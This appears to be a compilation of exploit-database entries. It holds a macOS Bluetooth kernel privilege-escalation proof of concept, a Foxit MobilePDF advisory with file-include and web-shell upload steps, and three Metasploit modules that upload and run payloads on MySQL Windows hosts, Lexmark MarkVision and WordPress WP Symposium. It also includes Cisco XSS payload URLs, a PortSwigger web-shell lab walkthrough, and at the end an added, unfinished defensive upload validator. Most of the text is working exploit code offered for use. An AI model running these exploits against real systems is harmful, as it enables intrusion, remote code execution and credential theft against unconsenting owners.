       fflush(stdout);

       kr = IOConnectCallMethod((mach_port_t) port,      /* Connection */
                                (uint32_t) 0,            /* Selector */
                                NULL, 0,                 /* input, inputCnt */
                                (const void*) &a,        /* inputStruct */
                                sizeof(a),               /* inputStructCnt */
                                NULL, NULL, NULL, NULL); /* Output stuff */

       printf("kr: %08x\n", kr);

       return IOServiceClose(port);
     }
  7. /*
      * lpe-issue1.c
      * Written for Mac OS X Yosemite (10.10.1) by @joystick and @rpaleari.
      *
      * Exploits IOBluetoothHCIUserClient::DispatchHCIWriteStoredLinkKey()
      *
      * gcc -Wall -o lpe-issue1{,.c} -framework IOKit
      *
      */

     #include <stdio.h>
     #include <stdlib.h>
     #include <string.h>
     #include <mach/mach.h>
     #include <mach/vm_map.h>
     #include <IOKit/IOKitLib.h>

     #define SIZE 0x1000

     struct BluetoothCall {
       uint64_t args[7];
       uint64_t sizes[7];
       uint64_t index;
     };

     #ifndef bswap64
     # define bswap64(num) \
         ( (((uint64_t)(num) << 56) ) \
         | (((uint64_t)(num) << 40) & UINT64_C(0x00FF000000000000)) \
         | (((uint64_t)(num) << 24) & UINT64_C(0x0000FF0000000000)) \
         | (((uint64_t)(num) << 8)  & UINT64_C(0x000000FF00000000)) \
         | (((uint64_t)(num) >> 8)  & UINT64_C(0x00000000FF000000)) \
         | (((uint64_t)(num) >> 24) & UINT64_C(0x0000000000FF0000)) \
         | (((uint64_t)(num) >> 40) & UINT64_C(0x000000000000FF00)) \
         | (((uint64_t)(num) >> 56) ) )
     #endif

     void create_requests(io_connect_t port) {
       struct BluetoothCall a;
       uint32_t i;
       kern_return_t kr;

       for (i = 0; i < 7; i++) {
         a.args[i] = (uint64_t) calloc(SIZE, sizeof(char));
         a.sizes[i] = SIZE;
       }

       /* DispatchHCIRequestCreate() */
       a.index = 0x0;

       *(uint64_t *)a.args[0] = 5*1000; /* Timeout */
       memset((void *)a.args[1], 0x81, 0x1000);
       memset((void *)a.args[2], 0x82, 0x1000);
       memset((void *)a.args[3], 0x83, 0x1000);
       memset((void *)a.args[4], 0x84, 0x1000);
       memset((void *)a.args[5], 0x85, 0x1000);
       memset((void *)a.args[6], 0x86, 0x1000);

       for(i = 0; i < 500; i++) {
         kr = IOConnectCallMethod((mach_port_t) port,      /* Connection */
                                  (uint32_t) 0,            /* Selector */
                                  NULL, 0,                 /* input, inputCnt */
                                  (const void*) &a,        /* inputStruct */
                                  120,                     /* inputStructCnt */
                                  NULL, NULL, NULL, NULL); /* Output stuff */
         if(kr == 0xe00002bd) /* Full */
           break;
       }
     }

     int main(void) {
       struct BluetoothCall a;
       int i;
       void *landing_page = calloc(SIZE, sizeof(char));

       /* Init a */
       for (i = 0; i < 7; i++) {
         a.args[i] = (uint64_t) calloc(SIZE, sizeof(char));
         a.sizes[i] = SIZE;
       }

       /* Finding vuln service */
       io_service_t service =
         IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOBluetoothHCIController"));
       if (!service) {
         return -1;
       }

       /* Connect to vuln service */
       io_connect_t port = (io_connect_t) 0;
       kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
       IOObjectRelease(service);
       if (kr != kIOReturnSuccess) {
         return kr;
       }

       /* Populating with fake requests. */
       create_requests(port);

       /* IOBluetoothHCIUserClient::DispatchHCIWriteStoredLinkKey() */
       a.index = 42;

       /* Req number */
       *((uint32_t *)a.args[0]) = 1;
       /* num_of_keys */
       *((uint32_t *)a.args[1]) = 0x20;
       /* Padding */
       memset((void *)a.args[3], 0x33, 152);
       /* mov rdi, [r14+0AB8h] */
       *((uint64_t *)(a.args[3]+152)) = bswap64((uint64_t)landing_page);
       /* mov rax, [rdi] */
       *((uint64_t *)((uint64_t)landing_page)) = (uint64_t)landing_page;
       /* call [rax+0x1d0]: this will trigger a #GP calling 0x4141414142424242 */
       *((uint64_t *)((uint64_t)landing_page+0x1d0)) = (uint64_t) 0x4141414142424242;

       /* Here some fixing to the vtable is required to return cleanly after the exploit */

     #if 0
       /* Debug print */
       for(i = 0; i < 120; i++) {
         if(i % 8 == 0) printf("\n");
         printf("\\x%02x", ((unsigned char *)&a)[i]);
       }
       printf("\n");
     #endif

       kr = IOConnectCallMethod((mach_port_t) port,      /* Connection */
                                (uint32_t) 0,            /* Selector */
                                NULL, 0,                 /* input, inputCnt */
                                (const void*) &a,        /* inputStruct */
                                120,                     /* inputStructCnt */
                                NULL, NULL, NULL, NULL); /* Output stuff */

       printf("kr: %08x\n", kr);

       return IOServiceClose(port);
     }
  8. Document Title: =============== Foxit MobilePDF v4.4.0 iOS - Multiple Web Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1400 Release Date: ============= 2015-01-12 Vulnerability Laboratory ID (VL-ID): ==================================== 1400 Common Vulnerability Scoring System: ==================================== 6.9 Product & Service Introduction: =============================== Foxit MobilePDF enables you to view and annotate PDF documents on the go, allowing you to work on your PDF documents anytime, anywhere. Specify the permissions to restrict operations to PDF files, such as copying content, adding annotation, managing page & bookmark, and printing. Share, store and synchronize PDF files. (Copy of the Vendor Homepage: https://itunes.apple.com/us/app/foxit-mobile-pdf/id507040546 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official Foxit MobilePDF v4.4.0 iOS mobile web-application. Vulnerability Disclosure Timeline: ================================== 2015-01-12: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Foxit Corporation Product: MobilePDF - iOS Web Application (Wifi) 4.4.0 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ 1.1 A local file include web vulnerability has been discovered in the official Foxit MobilePDF v4.4.0 iOS mobile web-application. The local file include vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise the mobile web-application. The vulnerability is located in the `filename` value of the wifi interface `upload` module. 
Local attackers are able to manipulate the wifi web interface by usage of the vulnerable `upload` POST method request. The service does not encode or parse the `filename` context on uploads. Attackers can include an existing local application path or an existing local device path as source in connection with script code to compromise the iOS app. The execution of unauthorized local file or path request occurs in the index of documents module of the wifi file service application after the inject. The request method to inject is POST and the attack vector is located on the application-side of the affected iOS application. The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9. Exploitation of the local file include web vulnerability in the upload module requires no user interaction or privileged web-application user account. Successful exploitation of the local file include web vulnerability results in mobile application compromise or compromised device components. Vulnerable Method(s): [+] POST Vulnerable Module(s): [+] Upload Vulnerable Parameter(s): [+] filename (name) Affected Module(s): [+] Index of Documents (http://localhost:8888) 1.2 An arbitrary file upload web vulnerability has been discovered in the official Foxit MobilePDF v4.4.0 iOS mobile web-application. The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the system validation and compromise the web-server. The vulnerability is located in the filename value of the `upload` file module. Remote attackers are able to upload a php or js web-shell by a rename of the filename with multiple extensions in the upload POST method request. The attacker uploads for example a web-shell with the following name and extension `pentest.png.html.php.js.aspx.png`. After the upload the attacker needs to open the file in the wifi web-application interface. 
He deletes the .png file extension and can access the webshell with elevated access rights to execute. The security risk of the arbitrary file upload web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.6. Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password. Successful exploitation of the arbitrary file upload vulnerability results in unauthorized file access (aap/device) and compromise of http web-server. Request Method(s): [+] [POST] Vulnerable Module(s): [+] Upload Vulnerable Parameter(s): [+] filename (multiple extensions) Affected Module(s): [+] Index of Documents (http://localhost:8888) Proof of Concept (PoC): ======================= 1.1 The local file include vulnerability can be exploited by remote attackers without privileged application user account or user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Download and install the FoxIT MobilePDF iOS application 2. Surf to the Documents Index of the Wifi Server (http://localhost:8888) 3. Start to choose a file for the upload function by usage of the search 4. Intercept the session by usage of a tamper and change the name value to the local device path source 5. Continue the request and save the settings. After that go back to the Index of Documents Note: The execution of the script code occurs in the vulnerable name value of the index file dir list 6. Successful reproduce of the security vulnerability! 
PoC: Index of Documents (Name) <tr><td><a href="/<img src="><img src="./[LOCAL FILE INCLUDE VULNERABILITY!]</a"></a></td><td align="center">file</td> <td align="center"><span class="m">2015-01-10 13:49</span></td><td align="center"><span class="s">538 B</span></td></tr> --- PoC Session Logs [POST] (File Include > Upload)--- Status: 200[OK] POST http://localhost:8888/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[3624] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:8888] User-Agent [Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:8888/] Connection[keep-alive] POST-Daten: POST_DATA[-----------------------------3796507625132 Content-Disposition: form-data; name="button"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!]+2.png" Content-Type: image/png --- PoC Session Logs [GET] (File Dir Index List)--- 13:54:26.427[48ms][total 48ms] Status: 200[OK] GET http://localhost:8888/%3C/./[LOCAL FILE INCLUDE VULNERABILITY!] Load Flags[LOAD_NORMAL] Größe des Inhalts[142] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:8888] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0] Accept[image/png,image/*;q=0.8,*/*;q=0.5] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:8888/] Connection[keep-alive] Response Header: Accept-Ranges[bytes] Content-Length[142] Date[Sa., 10 Jan. 2015 12:49:30 GMT] Reference(s): http://localhost:8888/ http://localhost:8888/%3C/./ 1.2 The arbitrary file upload vulnerability can be exploited by remote attackers without privileged application user account or user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. 
PoC: URL
http://localhost:8888/./webshell.png.html.php

PoC: Index of Documents

<tr><td><a href="/webshell.png.html.php.js.png">webshell.png.html.php.js.png</a></td>
<td align="center">file</td><td align="center"><span class="m">2015-01-10 13:58</span></td>
<td align="center"><span class="s">538 B</span></td></tr>


--- PoC Session Logs [POST] ---
14:03:16.481[149ms][total 1583ms]
Status: 200[OK]
POST http://localhost:8888/
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ]
Größe des Inhalts[3883] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost:8888]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://localhost:8888/]
      Connection[keep-alive]
   POST-Daten:
      POST_DATA[-----------------------------282243582256
Content-Disposition: form-data; name="button"; filename="webshell.png.html.php.js.png"
Content-Type: image/png


Reference(s):
http://localhost:8888/
http://localhost:8888/./webshell.png.html.php


Solution - Fix & Patch:
=======================
1.1
The file include vulnerability can be patched by a secure parse and encode of the vulnerable `filename` value in the upload POST method request.
Restrict the filename input and filter with an own set exception to prevent application-side attacks.
Parse also in the Index of Documents the vulnerable name output value to solve the issue.

1.2
Restrict the vulnerable `filename` value and implement a secure filter mechanism with own exception to prevent the upload of files with multiple extensions.
Restrict the upload folder and disallow the execution of files that are already uploaded.


Security Risk:
==============
1.1
The security risk of the local file include web vulnerability in the upload POST method request is estimated as high. (CVSS 6.9)

1.2
The security risk of the arbitrary file upload vulnerability in the upload POST method request is estimated as high. (CVSS 6.6)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with
fraud/stolen material.

Domains:    www.vulnerability-lab.com   - www.vuln-lab.com                       - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com - research@vulnerability-lab.com         - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com - vulnerability-lab.com/contact.php    - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab     - facebook.com/VulnerabilityLab          - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify,
use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
  9.
##
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::MYSQL
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle MySQL for Microsoft Windows FILE Privilege Abuse',
      'Description'    => %q{
        This module takes advantage of a file privilege misconfiguration problem
        specifically against Windows MySQL servers. This module abuses the FILE
        privilege to write a payload to Microsoft's All Users Start Up directory
        which will execute every time a user logs in. The default All Users Start
        Up directory used by the module is Windows 7 friendly.
      },
      'Author'         =>
        [
          'sinn3r',
          'Sean Verity <veritysr1980[at]gmail.com>'
        ],
      'DefaultOptions' => { 'DisablePayloadHandler' => 'true' },
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2012-5613'], #DISPUTED
          ['OSVDB', '88118'],
          ['EDB', '23083'],
          ['URL', 'http://seclists.org/fulldisclosure/2012/Dec/13']
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'MySQL on Windows', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 01 2012'
    ))

    register_options(
      [
        OptString.new('USERNAME', [ true, 'The username to authenticate as']),
        OptString.new('PASSWORD', [ true, 'The password to authenticate with']),
        OptString.new('STARTUP_FOLDER', [ true, 'The All Users Start Up folder', '/programdata/microsoft/windows/start menu/programs/startup/'])
      ])
  end

  def check
    m = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
    return Exploit::CheckCode::Safe unless m
    return Exploit::CheckCode::Appears if is_windows?
    Exploit::CheckCode::Safe
  end

  def peer
    "#{rhost}:#{rport}"
  end

  def query(q)
    rows = []
    begin
      res = mysql_query(q)
      return rows unless res
      res.each_hash do |row|
        rows << row
      end
    rescue RbMysql::ParseError
      return rows
    end
    rows
  end

  def is_windows?
    r = query("SELECT @@version_compile_os;")
    r[0]['@@version_compile_os'] =~ /^Win/ ? true : false
  end

  def get_drive_letter
    r = query("SELECT @@tmpdir;")
    drive = r[0]['@@tmpdir'].scan(/^(\w):/).flatten[0] || ''
    drive
  end

  def upload_file(bin, dest)
    p = bin.unpack("H*")[0]
    query("SELECT 0x#{p} into DUMPFILE '#{dest}'")
  end

  def exploit
    unless datastore['STARTUP_FOLDER'].start_with?('/') && datastore['STARTUP_FOLDER'].end_with?('/')
      fail_with(Failure::BadConfig, "STARTUP_FOLDER should start and end with '/' Ex: /programdata/microsoft/windows/start menu/programs/startup/")
    end

    print_status("#{peer} - Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
    begin
      m = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
    rescue RbMysql::AccessDeniedError
      fail_with(Failure::NoAccess, "#{peer} - Access denied")
    end
    fail_with(Failure::NoAccess, "#{peer} - Unable to Login") unless m

    unless is_windows?
      fail_with(Failure::NoTarget, "#{peer} - Remote host isn't Windows")
    end

    begin
      drive = get_drive_letter
    rescue RbMysql::ParseError
      fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name")
    end
    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name") unless drive

    exe_name = Rex::Text::rand_text_alpha(5) + ".exe"
    dest = "#{drive}:#{datastore['STARTUP_FOLDER']}#{exe_name}"
    exe = generate_payload_exe

    print_status("#{peer} - Uploading to '#{dest}'")
    begin
      upload_file(exe, dest)
    rescue RbMysql::AccessDeniedError
      fail_with(Failure::NotVulnerable, "#{peer} - No permission to write. I blame kc :-)")
    end

    register_file_for_cleanup("#{dest}")
  end
end
  10.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Lexmark MarkVision Enterprise Arbitrary File Upload',
      'Description'    => %q{
        This module exploits a code execution flaw in Lexmark MarkVision Enterprise before 2.1.
        A directory traversal in the GfdFileUploadServlet servlet allows an unauthenticated
        attacker to upload arbitrary files, including arbitrary JSP code. This module has been
        tested successfully on Lexmark MarkVision Enterprise 2.0 with Windows 2003 SP2.
      },
      'Author'         =>
        [
          'Andrea Micalizzi', # Vulnerability Discovery
          'juan vazquez'      # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2014-8741'],
          ['ZDI', '14-410'],
          ['URL', 'http://support.lexmark.com/index?page=content&id=TE666&locale=EN&userlocale=EN_US']
        ],
      'Privileged'     => true,
      'Platform'       => 'win',
      'Arch'           => ARCH_JAVA,
      'Targets'        =>
        [
          [ 'Lexmark Markvision Enterprise 2.0', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 09 2014'))

    register_options(
      [
        Opt::RPORT(9788),
        OptString.new('TARGETURI', [true, 'ROOT path', '/'])
      ], self.class)
  end

  def check
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path.to_s, 'mve', 'help', 'en', 'inventory', 'am_about.html')
    })

    version = nil
    if res && res.code == 200 && res.body && res.body.to_s =~ /MarkVision Enterprise ([\d\.]+)/
      version = $1
    else
      return Exploit::CheckCode::Unknown
    end

    if Gem::Version.new(version) <= Gem::Version.new('2.0.0')
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    jsp_leak = jsp_path
    jsp_name_leak = "#{rand_text_alphanumeric(4 + rand(32 - 4))}.jsp"
    # By default files uploaded to C:\Program Files\Lexmark\Markvision Enterprise\apps\library\gfd-scheduled
    # Default app folder on C:\Program Files\Lexmark\Markvision Enterprise\tomcat\webapps\ROOT
    traversal_leak = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_name_leak}\x00.pdf"

    print_status("#{peer} - Uploading info leak JSP #{jsp_name_leak}...")
    if upload_file(traversal_leak, jsp_leak)
      print_good("#{peer} - JSP successfully uploaded")
    else
      fail_with(Failure::Unknown, "#{peer} - JSP upload failed")
    end

    res = execute(jsp_name_leak)
    if res && res.code == 200 && res.body.to_s !~ /null/ && res.body.to_s =~ /Path:(.*)/
      upload_path = $1
      print_good("#{peer} - Working directory found in #{upload_path}")
      register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_name_leak))
    else
      print_error("#{peer} - Couldn't retrieve the upload directory, manual cleanup will be required")
    end

    jsp_payload_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
    jsp_payload = payload.encoded
    traversal_payload = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_payload_name}\x00.pdf"

    print_status("#{peer} - Uploading JSP payload #{jsp_payload_name}...")
    if upload_file(traversal_payload, jsp_payload)
      print_good("#{peer} - JSP successfully uploaded")
      register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_payload_name)) if upload_path
    else
      fail_with(Failure::Unknown, "#{peer} - JSP upload failed")
    end

    print_status("#{peer} - Executing payload...")
    execute(jsp_payload_name, 3)
  end

  def upload_file(filename, contents)
    good_signature = rand_text_alpha(4 + rand(4))
    bad_signature = rand_text_alpha(4 + rand(4))

    post_data = Rex::MIME::Message.new
    post_data.add_part(good_signature, nil, nil, 'form-data; name="success"')
    post_data.add_part(bad_signature, nil, nil, 'form-data; name="failure"')
    post_data.add_part(contents, 'application/octet-stream', nil, "form-data; name=\"datafile\"; filename=\"#{filename}\"")

    res = send_request_cgi(
      {
        'uri'    => normalize_uri(target_uri.path, 'mve', 'upload', 'gfd'),
        'method' => 'POST',
        'data'   => post_data.to_s,
        'ctype'  => "multipart/form-data; boundary=#{post_data.bound}"
      })

    if res && res.code == 200 && res.body && res.body.to_s.include?(good_signature)
      return true
    else
      return false
    end
  end

  def execute(jsp_name, time_out = 20)
    res = send_request_cgi({
      'uri'    => normalize_uri(target_uri.path.to_s, jsp_name),
      'method' => 'GET'
    }, time_out)

    res
  end

  def jsp_path
    jsp =<<-EOS
<%@ page language="Java" import="java.util.*"%>
<% out.println("Path:" + System.getProperty("catalina.home")); %>
    EOS

    jsp
  end
end
  11.
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::HTTP::Wordpress

  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'WordPress WP Symposium 14.11 Shell Upload',
      'Description'     => %q{WP Symposium Plugin for WordPress contains a flaw that allows a
                          remote attacker to execute arbitrary PHP code. This flaw exists because
                          the /wp-symposium/server/file_upload_form.php script does not properly
                          verify or sanitize user-uploaded files. By uploading a .php file, the
                          remote system will place the file in a user-accessible path. Making a
                          direct request to the uploaded file will allow the attacker to execute
                          the script with the privileges of the web server.},
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Claudio Viviani',                 # Vulnerability disclosure
          'Rob Carr <rob[at]rastating.com>'  # Metasploit module
        ],
      'References'      =>
        [
          ['OSVDB', '116046'],
          ['WPVDB', '7716']
        ],
      'DisclosureDate'  => 'Dec 11 2014',
      'Platform'        => 'php',
      'Arch'            => ARCH_PHP,
      'Targets'         => [['wp-symposium < 14.12', {}]],
      'DefaultTarget'   => 0
    ))
  end

  def check
    check_plugin_version_from_readme('wp-symposium', '14.12')
  end

  def generate_mime_message(payload, payload_name, directory_name, symposium_url)
    data = Rex::MIME::Message.new
    data.add_part('1', nil, nil, 'form-data; name="uploader_uid"')
    data.add_part("./#{directory_name}/", nil, nil, 'form-data; name="uploader_dir"')
    data.add_part(symposium_url, nil, nil, 'form-data; name="uploader_url"')
    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"files[]\"; filename=\"#{payload_name}\"")
    data
  end

  def exploit
    print_status("#{peer} - Preparing payload")
    unique_name = Rex::Text.rand_text_alpha(10)
    payload_name = "#{unique_name}.php"
    symposium_url = normalize_uri(wordpress_url_plugins, 'wp-symposium', 'server', 'php')
    payload_url = normalize_uri(symposium_url, unique_name, payload_name)
    data = generate_mime_message(payload, payload_name, unique_name, symposium_url)
    symposium_url = normalize_uri(symposium_url, 'index.php')

    print_status("#{peer} - Uploading payload to #{payload_url}")
    res = send_request_cgi(
      'method' => 'POST',
      'uri'    => symposium_url,
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => data.to_s
    )

    if res && res.code == 200 && res.body.length > 0 && !res.body.include?('error') && res.body != '0'
      print_good("#{peer} - Uploaded the payload")
      register_files_for_cleanup(payload_name)

      print_status("#{peer} - Executing the payload...")
      send_request_cgi(
        {
          'uri'    => payload_url,
          'method' => 'GET'
        }, 5)
      print_good("#{peer} - Executed payload")
    else
      if res.nil?
        fail_with(Failure::Unreachable, "No response from the target")
      else
        vprint_error("#{peer} - HTTP Status: #{res.code}")
        vprint_error("#{peer} - Server returned: #{res.body}")
        fail_with(Failure::UnexpectedReply, "Failed to upload the payload")
      end
    end
  end
end
  12. source: https://www.securityfocus.com/bid/47903/info

Cisco Unified Operations Manager is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

This issue is being tracked by Cisco Bug ID CSCto12712.

Cisco Unified Operations Manager versions prior to 8.6 are vulnerable.

http://www.example.com/CSCOnm/servlet/com.cisco.nm.help.ServerHelpEngine?tag=Portal_introductionhomepage61a8b"%3balert(1)
  13. source: https://www.securityfocus.com/bid/47902/info

CiscoWorks Common Services is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.

Exploiting this vulnerability could allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and launch other attacks.

This issue is being monitored by Cisco Bug ID CSCto12704.

CiscoWorks Common Services 3.3 and prior are vulnerable.

http://www.example.com/cwhp/device.center.do?device=&72a9f"><script>alert(1)</script>5f5251aaad=1
  14. In this post we will be solving the PortSwigger lab “Web shell upload via Content-Type restriction bypass”.

To solve the lab we have to upload a PHP file that reads and shows us the contents of the file /home/carlos/secret, because to prove that we have completed the lab we will have to submit the contents of this file. In addition, the server is configured to block file uploads based on their Content-Type, so we will have to bypass this defence.

In this case, the lab itself provides us with an account to log in with, so let's do that:

Once we have logged in, we find the account's profile:

As we can see, we have an option to upload a file, and specifically it appears to be for updating the profile avatar. Let's try to take advantage of this option to upload the following PHP file:

First of all, let's set up Burp Suite to intercept the request:

Once Burp Suite is ready together with the proxy, we select the file and click “Upload”:

Here Burp Suite will intercept the file upload request:

We will send the request to the Repeater to work with it more comfortably; to do so, press Ctrl+R.

Once in the Repeater, when we click “Send”, we can see the server's response to the file upload:

In this case, it indicates that files whose Content-Type header is application/x-php are not allowed, and that only those with image/jpeg or image/png are allowed.

Knowing the kind of restriction the server is enforcing on us, we can simply change the Content-Type of our request:

With this, the contents of the file do not change, and it does not affect how the file is interpreted either. With this change, we try the file upload again:

This time we see that it has been uploaded correctly.

We can see this response in the browser as follows:

Having reached this point, we can now turn off Burp Suite, since we will not make further use of it. With that, we go back to our profile.

Now, if we look at the profile, we can see that the avatar has changed, and it now shows an error because the image does not load properly:

Right-clicking, we can go to the direct path of the image to see whether it is our PHP file:

Indeed, the PHP file we uploaded has been stored as the avatar file; that is why it did not load in the profile, as it was trying to load an image when the file was not one.

On visiting the PHP file, the code we placed has been interpreted, and we manage to read the secret file.

Having read this file, we simply submit the answer:

And in this way, we complete the lab:
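An added example, written for this page rather than taken from the Vulnerability Lab advisory or the lab write-up above: the server-side checks that the advisory's fix section (items 1.1 and 1.2) calls for, and whose absence the Content-Type bypass in the write-up relies on. The validator refuses traversal and NUL bytes in the filename, allows exactly one extension from an allowlist, decides by the file's magic bytes rather than by the declared Content-Type, and HTML-escapes any name echoed into a directory listing. Function names, the allowlist and the sample inputs are mine.

```python
import html
import re
from dataclasses import dataclass

# Allowed single extensions, each paired with the magic bytes a genuine file of
# that type starts with and the one Content-Type a client must declare for it.
# Constructed for this example; extend to the application's real needs.
ALLOWED_TYPES = {
    "png":  (b"\x89PNG\r\n\x1a\n", "image/png"),
    "jpg":  (b"\xff\xd8\xff", "image/jpeg"),
    "jpeg": (b"\xff\xd8\xff", "image/jpeg"),
}

# Only this character set survives into the stored file name.
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


@dataclass
class UploadDecision:
    ok: bool
    reason: str
    stored_name: str = ""


def validate_upload(filename: str, declared_type: str, data: bytes) -> UploadDecision:
    """Decide whether an upload may be stored, and under which sanitised name.

    The declared Content-Type is never the basis of the decision: it is a
    client-controlled header, which is exactly what the lab write-up changes
    from application/x-php to image/png. The body's magic bytes decide, and the
    header is only required to agree with them.
    """
    # 1. Raw path material is refused outright: NUL bytes (name.jsp\x00.pdf style
    #    truncation), path separators, dot-files and traversal components.
    if "\x00" in filename or "/" in filename or "\\" in filename:
        return UploadDecision(False, "path separator or NUL byte in filename")
    if filename == "" or filename.startswith("."):
        return UploadDecision(False, "empty name, dot-file or traversal component")

    # 2. Exactly one extension. webshell.png.html.php.js.png carries five, and a
    #    handler keyed on an inner .php or .html must never become reachable.
    parts = filename.split(".")
    if len(parts) != 2:
        return UploadDecision(False, "filename must have exactly one extension")
    stem, ext = parts[0], parts[1].lower()
    if not SAFE_STEM.match(stem):
        return UploadDecision(False, "filename stem contains disallowed characters")
    if ext not in ALLOWED_TYPES:
        return UploadDecision(False, f"extension .{ext} is not in the allowlist")

    # 3. The body must actually be the claimed type, and the declared header
    #    must agree with the body, not the other way round.
    magic, mime = ALLOWED_TYPES[ext]
    if not data.startswith(magic):
        return UploadDecision(False, "file body does not match its extension")
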